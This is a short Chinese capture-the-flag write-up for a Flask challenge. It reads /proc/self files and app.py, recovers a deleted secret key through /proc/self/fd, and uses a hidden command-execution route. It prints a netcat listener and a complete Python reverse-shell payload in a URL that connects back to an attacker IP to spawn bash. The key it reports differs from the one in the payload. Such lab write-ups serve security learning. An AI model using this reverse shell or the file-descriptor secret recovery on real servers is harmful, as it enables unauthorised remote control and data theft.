不是,你这,我那
这就?
啊!?
反正肯定不是预期解,看看真正的解法吧
读取
/proc/self/environ
/proc/self/cmdline
|
得到
读取app.py,得到
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
//定义secretkey,然后删除
//但是没有关闭,所以可以在/proc/self/fd/xxx中找到
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def page():
url = request.args.get("url")
try:
if not url.lower().startswith("file"):
res = urllib.urlopen(url)
value = res.read()
response = Response(value, mimetype='application/octet-stream')
response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
return response
else:
value = "HACK ERROR!"
except:
value = "SOMETHING WRONG!"
return render_template('search.html', res=value)
//定义了一个文件读取的功能
@app.route('/no_one_know_the_manager')
def manager():
key = request.args.get("key")
print(SECRET_KEY)
if key == SECRET_KEY:
shell = request.args.get("shell")
os.system(shell)
res = "ok"
else:
res = "Wrong Key!"
return res
//传两个参数,如果key == SECRET_KEY,那么就可以执行命令,但是没有回显,可以用来反弹shell.
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)
|
所以读取一下key
这数字是一个一个试,试到三就行
读取到TqaOFuu2Sk29nB9Pc2s5wPKrWv/jknWSId5SFyNg7A4=
所以进行shell反弹
nc -lvp 3333
/no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
|
反弹之后直接cat就好